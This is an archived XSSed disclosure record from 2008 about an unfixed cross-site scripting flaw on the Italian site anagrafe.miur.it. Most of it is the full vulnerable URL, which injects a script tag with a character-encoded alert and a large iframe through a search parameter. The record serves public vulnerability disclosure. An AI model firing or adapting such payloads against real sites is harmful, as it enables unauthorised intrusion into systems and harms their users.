Unfixed XSS vulnerability at anagrafe.miur.it

2008-04-10T00:00:00
ID XSSED:51166
Type xssed
Reporter death-angel
Modified 2008-04-10T00:00:00

Description

Security researcher death-angel, has submitted on 04/10/2008 a cross-site-scripting (XSS) vulnerability affecting anagrafe.miur.it, which at the time of submission ranked 24921 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/10/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://anagrafe.miur.it/cerca.php?PHPSESSID=c2466c41428372b1adfb3da128e269d3&misure[]=imm&filtra-anno-accademico=&filtra-tipo-laurea=&filtra-area=&filtra-classe=&filtra-regione-univ=&filtra-universita=&filtra-facolta=&filtra-regione-sede=&filtra-provincia-sede=&filtra-comune-sede=&filtra-cittadinanza=&filtra-tipo-nazionalita=&filtra-regione-res=&filtra-provincia-res=&filtra-tipo-diploma=&filtra-fascia-voto-diploma=&filtra-anno-diploma=&filtra-fascia-eta=&filtra-sesso=&filtra-anno-corso=&filtra-parola-chiave="<marquee><h1><script>alert(String.fromCharCode(120%2C+115%2C+115%2C+32%2C+98%2C+121%2C+32%2C+100%2C+101%2C+97%2C+116%2C+104%2C+45%2C+97%2C+110%2C+103%2C+101%2C+108))%3B<%2Fscript><iframe+height%3D"999"+width%3D"999"+src%3D"http%3A%2F%2Fxssed.com%2F">&module=Anagrafe&action=Risultati&gruppo[]=anno-accademico&gruppo[]=universita&gruppo[]=classe&gruppi-js=anno-accademico%3Auniversita%3Aclasse